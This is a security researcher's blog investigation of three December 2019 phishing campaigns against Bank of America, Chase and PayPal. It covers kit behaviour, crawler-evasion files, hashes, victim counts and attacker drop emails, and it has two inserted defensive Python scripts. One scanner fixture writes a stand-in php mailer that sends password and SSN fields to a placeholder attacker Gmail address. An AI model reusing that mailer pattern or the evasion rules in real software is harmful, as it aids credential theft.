
The Dark Water Journal: American Phisher

Sergiu Sechel
The Dark Water Journal
13 min read, Dec 24, 2019


The following article presents an independent investigation into three separate phishing campaigns which were active during December 2019. They impacted Bank of America, Chase Bank (JP Morgan Chase) and PayPal. Although there are several active phishing campaigns targeting these global companies, I focused on these particular three campaigns because they all share two common characteristics:

  • the attackers used mainly compromised websites to host and deliver the phishing kits
  • parts of the phishing kits used in these campaigns are several years old and available on the public internet for download

Initially the investigation started with the analysis of the phishing campaign against Bank of America, but while hunting for the phishing kit on a compromised website I discovered another phishing kit targeting Chase Bank.

Based on the available data and on the conclusions drawn from the investigation, the three phishing campaigns are not correlated. There is a certain “modus operandi” observed in all three campaigns, and the threat actors behind them share some common TTPs. However, the key indicators required to correlate the campaigns and attribute them to a single threat actor were not identified.

Chapter 1: Bank of America Phishing Campaign

The phishing campaign against Bank of America was observed and tracked from December 3rd 2019 until it reached an apex around December 15, with around 1500 compromised websites hosting the phishing kit. Since then the campaign has lost some momentum.

Spoofed version of the Bank of America website used for phishing sensitive user information

It’s safe to assume that all information a user types into the forms displayed on the phishing page will be captured by the attacker, but from a forensics perspective I want to understand the mechanics behind the attack. This is very important for both legal offensive and defensive purposes (for example red teaming or incident response).

The next step in the investigation was to identify, retrieve and analyze the phishing kit used in the campaign. Using BlackShark I identified several compromised websites and the phishing kit was found on one of them archived under the name “bofanew1.zip”.

The archived phishing kit stored on one compromised website

The analysis revealed two php scripts named “post1.php” and “post2.php” which contained the malicious actions. “post1.php” is used to capture the following user information: country, current date and time, browser agent, hostname, user ID, password and client IP address.

Contents of the script post1.php from the BoA phishing kit

The captured data is sent via email to “shemarmooremg121@gmail.com”.

The “post2.php” is used by the attacker to capture the answers to additional questions that the user is requested to answer:

Phishing forms from the BoA phishing kit
Contents of the script post2.php from the BoA phishing kit

The captured data is likewise sent via email to “shemarmooremg121@gmail.com”.

I searched for the hashes of the php scripts in antivirus databases and threat intelligence feeds: “step2.php” was identified as malicious by several antivirus engines and was first submitted to VirusTotal in February 2018. The other files' hashes were not found on VirusTotal or in other databases:

  • post1.php 1356FC54520C18F7580531B200CC677C9C59D25E3FE8C59AB9ED80B9A56B0A36
  • post2.php D5242737A7C9BFB355193F8F1DE7DCDCC36DE425600EAA50B9585C69041E32B6
  • step2.php 524A962A5D2299E9658478932EFAEDEC226DE805A0AF17A0BF824990598761F7
  • step3.php 5b37e48b5f52d1246d7243c2b49d1d2841e887b72bb48a8daeae91f3b8844c7b

Since the campaign uses mostly compromised websites, it is fairly easy for users to identify the spoofed BoA websites by looking at the URL.

Chapter 2: Chase Bank Phishing Campaign

As previously mentioned, I discovered the campaign against Chase Bank while investigating the BoA phishing campaign. During the hunt for the BoA phishing kit I discovered another kit on the same compromised website, named “chasefulll(2).zip”. From the timestamp, it was deployed on December 12, 2019.

The second phishing kit is more complex than the one found for BoA. It uses several methods to hide from search engines and security web crawlers but, like the BoA phishing kit, it uses email messages to transmit captured data to the attacker. The Chase Bank phishing kit appears to have been created by someone nicknamed “AK360WIRE”.

A spoofed graphic element from the Chase Bank login page

The kit’s first evasion method uses a “robots.txt” file which disallows access to the phishing kit folder for the following services: Googlebot, googlebot-image, googlebot-mobile, MSNBot, Slurp, Teoma, Gigabot, Robozilla, Nutch, ia_archiver, archive.org_bot, baiduspider, naverbot, yeti, yahoo-mmcrawler, psbot, yahoo-blogs/v3.9, AhrefsBot, MJ12bot, Majestic-12, Majestic-SEO, DSearch, Rogerbot, SemrushBot, BLEXBot, ScoutJet, SearchmetricsBot, BacklinkCrawler, Exabot, spbot, linkdexbot, Lipperhey Spider, SEOkicks-Robot and sistrix.

The second evasion technique uses an “.htaccess” file which includes the rules from the “robots.txt” and additionally has rules to deny access from several IP subnets.

Access rules designed to protect the Chase Bank phishing kit against analysis from web crawlers

The phishing kit contains several php scripts designed to capture sensitive user information. The “email.php” script is used to capture general user information: time and date, browser agent, hostname, email, password, client IP and country.

The “email1.php” script is used to capture more detailed user information: Full Name, Full Address, Address Line 2, City, State, Zip Code, Home Phone, Mobile Phone, SSN, Mother’s Maiden Name, date of birth, credit card number, CVV, credit card PIN and credit card expiration date.

The captured information is sent to the “companyresultbox121@gmail.com” email address.

The contents of email1.php of the Chase Bank phishing kit
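As an added example (not code from the article or from either kit), the following Python triage scanner looks on a web root for the traits described above and in the BoA chapter: a robots.txt that blocks the listed crawlers, an .htaccess with User-Agent filtering and IP deny rules, a php file that mails sensitive form fields to a free-mail address, and a kit archive dropped in the web root. The sample web root, the crawler subset and the placeholder recipient address are constructed assumptions.

```python
"""Triage scanner for the traces a php phishing kit leaves on a compromised
web root: a robots.txt/.htaccess that blocks crawlers and IP ranges, php that
mails form fields to a free-mail address, and a kit archive in the web root.
The sample tree is constructed below; the recipient is a placeholder."""
import re
import tempfile
from pathlib import Path

# Subset of the crawler names the article lists from the kit's robots.txt.
CRAWLER_NAMES = {"googlebot", "msnbot", "slurp", "ahrefsbot", "mj12bot",
                 "semrushbot", "ia_archiver", "archive.org_bot", "baiduspider"}
FREE_MAIL = re.compile(r"[\w.+-]+@(?:gmail|yahoo|hotmail|outlook)\.com", re.I)
# Form fields the kits harvest: passwords, SSN, card data, PIN.
SENSITIVE_FIELD = re.compile(
    r"\$_(?:POST|REQUEST)\[['\"](pass\w*|ssn|cvv|pin|card\w*)['\"]\]", re.I)
DENY_IP_RULE = re.compile(r"^\s*deny\s+from\s+\d", re.I | re.M)
UA_FILTER = re.compile(r"SetEnvIfNoCase\s+User-Agent", re.I)
MAIL_CALL = re.compile(r"\bmail\s*\(")
ARCHIVE_SUFFIXES = {".zip", ".rar", ".tar", ".gz", ".7z"}


def scan_webroot(root):
    """Return a list of (posix relative path, finding) for suspicious files."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        name = path.name.lower()
        if name == "robots.txt":
            text = path.read_text(errors="ignore").lower()
            blocked = [b for b in CRAWLER_NAMES if b in text]
            if len(blocked) >= 3:  # legitimate sites rarely blanket-block crawlers
                findings.append((rel, f"robots.txt blocks {len(blocked)} known crawlers"))
        elif name == ".htaccess":
            text = path.read_text(errors="ignore")
            if DENY_IP_RULE.search(text):
                findings.append((rel, ".htaccess denies IP ranges"))
            if UA_FILTER.search(text):
                findings.append((rel, ".htaccess filters crawlers by User-Agent"))
        elif path.suffix.lower() == ".php":
            text = path.read_text(errors="ignore")
            recipients = sorted(set(FREE_MAIL.findall(text)))
            fields = sorted({m.group(1).lower() for m in SENSITIVE_FIELD.finditer(text)})
            if MAIL_CALL.search(text) and recipients and fields:
                findings.append((rel, f"mails {fields} to {recipients}"))
        elif path.suffix.lower() in ARCHIVE_SUFFIXES:
            findings.append((rel, "archive in web root (possible kit drop)"))
    return findings


def build_sample_webroot():
    """Write a constructed web root mimicking the traits described in the article."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "robots.txt").write_text(
        "User-agent: Googlebot\nDisallow: /\nUser-agent: MSNBot\nDisallow: /\n"
        "User-agent: AhrefsBot\nDisallow: /\n")
    (root / ".htaccess").write_text(
        'SetEnvIfNoCase User-Agent "^Googlebot" bad_bot\nOrder Allow,Deny\n'
        "Allow from all\nDeny from env=bad_bot\nDeny from 192.0.2.0/24\n")
    (root / "index.php").write_text("<?php echo 'hello'; ?>\n")  # benign control
    (root / "kit").mkdir()
    # Minimal stand-in for the kit's mailer script; the address is a placeholder.
    (root / "kit" / "email1.php").write_text(
        "<?php\n$to = 'attacker-placeholder@gmail.com';\n"
        "$msg = $_POST['password'] . ' ' . $_POST['ssn'];\n"
        "mail($to, 'Result', $msg);\n")
    (root / "bofanew1.zip").write_bytes(b"PK\x05\x06" + b"\x00" * 18)  # empty zip
    return root


if __name__ == "__main__":
    for rel, finding in scan_webroot(build_sample_webroot()):
        print(f"{rel}: {finding}")
```

Run it against a real document root after taking a forensic copy; the thresholds (three blocked crawlers, free-mail recipients) are starting points to tune against known-good sites.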

The hashes of the php scripts are presented below. At the time of the investigation they were not found on the public internet or on VirusTotal:

  • action.php 3C375E0E65B491CBBD53AA95554524B2CF9AAD695888B7D4AF0B09DA545AA044
  • email.php 8421A3CBDB12993EF3241FBF4284C68626A6BCF0EE7B7BEF7032E9C2907D237E
  • email1.php 0C747C0E513C04E0C5032390D8D7A73D5AF1212BFB13EC0CF240E09D4280C986

The number of compromised websites hosting the phishing kit was around 300 during the investigation, and at that time the campaign was still ongoing.

Chapter 3: PayPal Phishing Campaign

The last phishing campaign investigated in December 2019 was against PayPal.

In this case the campaign was identified because several Romanian websites were compromised and the “Scam PayPal” phishing kit was deployed on them.

The spoofed PayPal login page
The Scam PayPal phishing kit

Using BlackShark, 386 compromised websites were identified, and again the next step was to retrieve the phishing kits from the websites for analysis. The phishing kits were retrieved from several websites together with log files which contained the victim IP addresses and countries. This enabled me to start tracking the phishing campaign and gain additional intelligence and metrics on its effectiveness. This activity was performed from 15 December until 19 December 2019.

The log files found on 3 compromised websites were used to analyze the performance of the phishing campaign. During the analysis the number of impacted countries was 73 and the total number of identified potential victims was around 12,000.

PayPal phishing campaign tracking using retrieved phishing logs from compromised websites
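The victim-count and country metrics described above, as an added example that is not the article's own tooling: it merges the logs retrieved from several compromised hosts, drops malformed lines, counts each victim IP once and reports potential victims, impacted countries and daily volume. The “timestamp | ip | country” line format and the sample lines are constructed assumptions, since the article does not show the kit's log layout.

```python
"""Victim-log metrics of the kind the article derives from logs retrieved from
compromised hosts (potential victims and impacted countries). The log line
format "timestamp | ip | country" and the sample lines are constructed
assumptions; the kit's real log layout is not shown in the article."""
import re
from collections import Counter
from datetime import datetime
from ipaddress import ip_address

LINE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s*\|\s*(\S+)\s*\|\s*([A-Z]{2})$")

# Constructed logs from two hosts; 198.51.100.10 appears on both.
HOST_A_LOG = """\
2019-12-15 08:01:10 | 198.51.100.10 | US
2019-12-15 08:05:33 | 198.51.100.11 | DE
2019-12-16 09:12:00 | 203.0.113.5 | RO
2019-12-16 09:15:45 | not-an-ip | RO
garbage line that should be skipped
2019-12-17 10:00:00 | 203.0.113.6 | US
"""
HOST_B_LOG = """\
2019-12-16 11:30:00 | 198.51.100.10 | US
2019-12-17 12:00:00 | 203.0.113.7 | FR
2019-12-18 13:00:00 | 203.0.113.8 | US
"""


def parse_log(text):
    """Yield (timestamp, ip, country) for well-formed lines; skip junk and bad IPs."""
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts, ip, cc = m.groups()
        try:
            ip_address(ip)
        except ValueError:
            continue
        yield datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), ip, cc


def campaign_metrics(logs):
    """Merge logs from several hosts, counting each victim IP once."""
    first_seen = {}
    per_day = Counter()
    for text in logs:
        for ts, ip, cc in parse_log(text):
            if ip in first_seen:  # same victim hitting a second kit copy
                continue
            first_seen[ip] = (ts, cc)
            per_day[ts.date().isoformat()] += 1
    countries = Counter(cc for _, cc in first_seen.values())
    return {
        "victims": len(first_seen),
        "countries": len(countries),
        "top": countries.most_common(3),
        "per_day": dict(sorted(per_day.items())),
    }


if __name__ == "__main__":
    print(campaign_metrics([HOST_A_LOG, HOST_B_LOG]))
```

Deduplicating by IP undercounts victims behind shared NAT and overcounts mobile users whose address changes, so treat the totals as an order of magnitude rather than an exact count.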

The analysis of the phishing kit uncovered different modules designed to capture vast amounts of personal and sensitive user information. Since the phishing kit can be found on the public internet, a detailed analysis of its capabilities will not be performed in this article. Some snippets of the kit’s features are presented in the following screenshots:

The contents of the Scam PayPal phishing kit

The only interesting part of the analysis of the “Scam PayPal” kit was identifying the email address used by the attacker to retrieve the captured data. In this campaign the attacker used the “bouesgs@gmail.com” email address.

The attacker’s email address used in the PayPal phishing campaign

Conclusions

There are several conclusions that can be drawn from these phishing campaigns. The first is that the attackers prefer to compromise WordPress websites to upload php based phishing kits. The second is that the attackers are re-using known phishing kits and prefer to retrieve captured data via email messages. The third is that the attackers have made some operational security mistakes which exposed the phishing kits' configuration files.

Since at this moment the campaigns are still active, I will present again below the email addresses used by the attackers for each of the three phishing campaigns:

  • Bank of America — shemarmooremg121@gmail.com
  • Chase Bank — companyresultbox121@gmail.com
  • PayPal — bouesgs@gmail.com

IOCs (Indicators of Compromise)

Bank of America — Compromised phishing domains


Chase Bank — Compromised phishing domains


PayPal — Compromised phishing domains



PhD, CISA, CISM, CRISC, CFE, CEH, CBP, CSSLP, CDPSE, GICSP, GPEN, GWAPT, GCFA, GNFA, GASF, GCTI, GREM, PMP